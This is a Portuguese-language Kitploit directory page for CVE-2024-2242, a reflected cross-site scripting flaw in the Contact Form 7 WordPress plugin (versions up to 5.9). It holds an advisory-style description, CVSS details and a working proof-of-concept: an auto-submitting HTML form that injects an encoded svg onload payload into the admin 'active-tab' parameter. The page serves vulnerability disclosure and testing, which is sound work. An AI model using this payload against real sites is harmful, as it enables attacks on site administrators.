Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-2242 — Contact Form 7 <= 5.9 - Cross-Site Scripting Refletido | Kitploit
Ferramentas/GitHubGitHub/randomrobbiebf/cve-2024-2242
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubrandomrobbiebf/cve-2024-2242

CVE-2024-2242

Contact Form 7 <= 5.9 - Cross-Site Scripting Refletido

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-2242

Contact Form 7 <= 5.9 - Cross-Site Scripting Refletido

Descrição

O plugin Contact Form 7 para WordPress é vulnerável a Cross-Site Scripting Refletido através do parâmetro ‘active-tab’ em todas as versões até, e incluindo, 5.9 devido a sanitização de entrada e escape de saída insuficientes. Isso torna possível que atacantes não autenticados injetem scripts web arbitrários em páginas que são executados se eles conseguirem enganar um usuário para realizar uma ação, como clicar em um link.

root@kitploit:~
CVSS: 6.1
Impact: 2.7
Vector: network
User Interaction: required
Privileges Required: none
Published: 2024-03-13
Updated: 2024-03-13

POC

Você precisa saber o valor do ID do post em que o formulário está; caso contrário, quando o administrador clicar no link, não funcionará. No geral, isso deveria ter privilégios exigidos como H, pois você precisa que o administrador clique no link.

root@kitploit:~
<html>

  <body>
    <form action="http://kubernetes.docker.internal/wp-admin/admin.php">
      <input type="hidden" name="page" value="wpcf7" />
      <input type="hidden" name="post" value="4478" />
      <input type="hidden" name="active&#45;tab" value="&apos;&quot;&gt;&lt;svg&#47;onload&#61;prompt&#40;7&#41;&#59;&gt;&#123;&#123;7&#42;7&#125;&#125;" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
Baixar ferramenta